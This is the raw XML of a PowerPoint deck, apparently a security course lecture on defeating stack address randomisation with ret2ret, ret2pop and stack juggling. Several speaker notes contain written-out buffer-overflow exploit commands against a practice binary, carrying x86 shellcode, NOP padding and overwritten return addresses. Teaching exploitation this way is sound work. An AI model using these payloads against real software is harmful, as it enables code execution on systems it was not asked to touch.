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31.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag132.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag135.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag136.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag137.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide6.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7.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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag143.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag144.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag145.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide11.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12.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag148.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag149.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag150.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag151.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide16.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide17.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8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag167.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag168.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag169.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag170.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag171.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag172.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag173.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide25.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26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag176.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag177.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag178.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag17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55"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId56"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="419" r:id="rId3"/>
    <p:sldId id="497" r:id="rId4"/>
    <p:sldId id="437" r:id="rId5"/>
    <p:sldId id="438" r:id="rId6"/>
    <p:sldId id="439" r:id="rId7"/>
    <p:sldId id="440" r:id="rId8"/>
    <p:sldId id="441" r:id="rId9"/>
    <p:sldId id="466" r:id="rId10"/>
    <p:sldId id="443" r:id="rId11"/>
    <p:sldId id="444" r:id="rId12"/>
    <p:sldId id="445" r:id="rId13"/>
    <p:sldId id="467" r:id="rId14"/>
    <p:sldId id="446" r:id="rId15"/>
    <p:sldId id="447" r:id="rId16"/>
    <p:sldId id="448" r:id="rId17"/>
    <p:sldId id="449" r:id="rId18"/>
    <p:sldId id="468" r:id="rId19"/>
    <p:sldId id="450" r:id="rId20"/>
    <p:sldId id="451" r:id="rId21"/>
    <p:sldId id="493" r:id="rId22"/>
    <p:sldId id="495" r:id="rId23"/>
    <p:sldId id="494" r:id="rId24"/>
    <p:sldId id="454" r:id="rId25"/>
    <p:sldId id="469" r:id="rId26"/>
    <p:sldId id="455" r:id="rId27"/>
    <p:sldId id="456" r:id="rId28"/>
    <p:sldId id="457" r:id="rId29"/>
    <p:sldId id="458" r:id="rId30"/>
    <p:sldId id="459" r:id="rId31"/>
    <p:sldId id="460" r:id="rId32"/>
    <p:sldId id="461" r:id="rId33"/>
    <p:sldId id="462" r:id="rId34"/>
    <p:sldId id="470" r:id="rId35"/>
    <p:sldId id="463" r:id="rId36"/>
    <p:sldId id="471" r:id="rId37"/>
    <p:sldId id="472" r:id="rId38"/>
    <p:sldId id="473" r:id="rId39"/>
    <p:sldId id="474" r:id="rId40"/>
    <p:sldId id="475" r:id="rId41"/>
    <p:sldId id="476" r:id="rId42"/>
    <p:sldId id="477" r:id="rId43"/>
    <p:sldId id="478" r:id="rId44"/>
    <p:sldId id="479" r:id="rId45"/>
    <p:sldId id="480" r:id="rId46"/>
    <p:sldId id="486" r:id="rId47"/>
    <p:sldId id="481" r:id="rId48"/>
    <p:sldId id="482" r:id="rId49"/>
    <p:sldId id="483" r:id="rId50"/>
    <p:sldId id="484" r:id="rId51"/>
    <p:sldId id="485" r:id="rId52"/>
    <p:sldId id="496" r:id="rId53"/>
    <p:sldId id="49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LR" id="{1B6ECEC8-6A4B-5545-9892-7D5A21F94478}">
          <p14:sldIdLst>
            <p14:sldId id="419"/>
            <p14:sldId id="497"/>
            <p14:sldId id="437"/>
            <p14:sldId id="438"/>
            <p14:sldId id="439"/>
            <p14:sldId id="440"/>
            <p14:sldId id="441"/>
            <p14:sldId id="466"/>
            <p14:sldId id="443"/>
            <p14:sldId id="444"/>
            <p14:sldId id="445"/>
            <p14:sldId id="467"/>
            <p14:sldId id="446"/>
            <p14:sldId id="447"/>
            <p14:sldId id="448"/>
            <p14:sldId id="449"/>
            <p14:sldId id="468"/>
            <p14:sldId id="450"/>
            <p14:sldId id="451"/>
            <p14:sldId id="493"/>
            <p14:sldId id="495"/>
            <p14:sldId id="494"/>
            <p14:sldId id="454"/>
            <p14:sldId id="469"/>
            <p14:sldId id="455"/>
            <p14:sldId id="456"/>
            <p14:sldId id="457"/>
            <p14:sldId id="458"/>
            <p14:sldId id="459"/>
            <p14:sldId id="460"/>
            <p14:sldId id="461"/>
            <p14:sldId id="462"/>
            <p14:sldId id="470"/>
            <p14:sldId id="463"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Probability" id="{48F27A9A-039B-9744-9700-2B170FAD7B1A}">
          <p14:sldIdLst>
            <p14:sldId id="471"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
            <p14:sldId id="474"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="477"/>
            <p14:sldId id="478"/>
            <p14:sldId id="479"/>
            <p14:sldId id="480"/>
            <p14:sldId id="486"/>
            <p14:sldId id="481"/>
            <p14:sldId id="482"/>
            <p14:sldId id="483"/>
            <p14:sldId id="484"/>
            <p14:sldId id="485"/>
            <p14:sldId id="496"/>
            <p14:sldId id="498"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="1440">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="14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842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463D"/>
    <a:srgbClr val="C00000"/>
    <a:srgbClr val="953735"/>
    <a:srgbClr val="F79646"/>
    <a:srgbClr val="B649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6" autoAdjust="0"/>
    <p:restoredTop sz="81891" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="1984" y="176"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1440"/>
        <p:guide pos="3840"/>
        <p:guide pos="14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160"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-40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commentAuthors" Target="commentAuthors.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11/6/17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11/6/17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9DCDB-C6DE-174F-AB9C-CB119D5B5F57}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189800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317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1DDD87-64C2-B149-A59C-5124D2E5CC8D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122289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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "a"x8 . "\x04\x85\x04\x08"') abc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337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FBEFBF-F13D-824E-94DB-F18D6C3986EC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182729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358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189470-E3CB-0046-9A4D-45B40B6E7F33}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157193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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x90"x33 . "\xcf\x83\x04\x08"')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378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0DC711-2747-C44B-9958-0612200EF6C6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="546705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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> sort of technique is called stack juggling sometimes. It’s not always applicable.   We overwrite with the address of a ‘ret’ instruction. Note this is possible because 1) .text is not randomized, and 2) every program contains a ret.  The &amp;ret here means the address of a return.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>When the function return, ret = pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>eip</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jmp</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eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>, walking up the stack. Finally we jump to the address of the shellcode. Note that it overwrites the low-order byte. If the pointer already points to shellcode, this is a point of imprecision. note it may help out as well, e.g., the overwritten pointer does not point to shellcode. in this case, the NULL will make the address smaller, potentially making it point to shellcode (that is the 0x00 animation).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399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AE8BB4-A898-D345-AE9A-F34C0B9E2B1A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547187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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> is an example program for which ret2ret is possible.  You overwrite everything from the ret address up to &amp;no with the address of a ret instruction.  You will overwrite the least significant byte of &amp;no with a null. This will mean &amp;no points down on the stack (towards buffer).  The final ret (just before &amp;no on the stack) will cause control to be transferred to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0"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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399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AE8BB4-A898-D345-AE9A-F34C0B9E2B1A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1847272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ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2pop is a variant where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> we can skip over the NULL byte problem mentioned in ret2ret.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419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F26031-2EAD-D446-8028-96BC67D6E127}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939335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2000">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "\xe3\x84\x04\x08"x18 . "\x73\x85\x04\x08"') $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>./exploitme $(perl -e 'print "\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6b\x6b\x65\x79\x89\xe2\x42\x50\x52\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" . "\x90"x33 . "\x73\x85\x04\x08"') foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44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D9A443-4CE4-8C42-83F1-0D704836F220}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258635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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1119961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a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>----- Meeting Notes (1/31/12 20:41) -----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Swap 1 and 2</a:t>
            </a:r>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49947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the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has changed.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2032069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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86092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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694270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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2120617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a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>----- Meeting Notes (1/31/12 20:41) -----</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Titles</a:t>
            </a:r>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1587448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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2051004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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
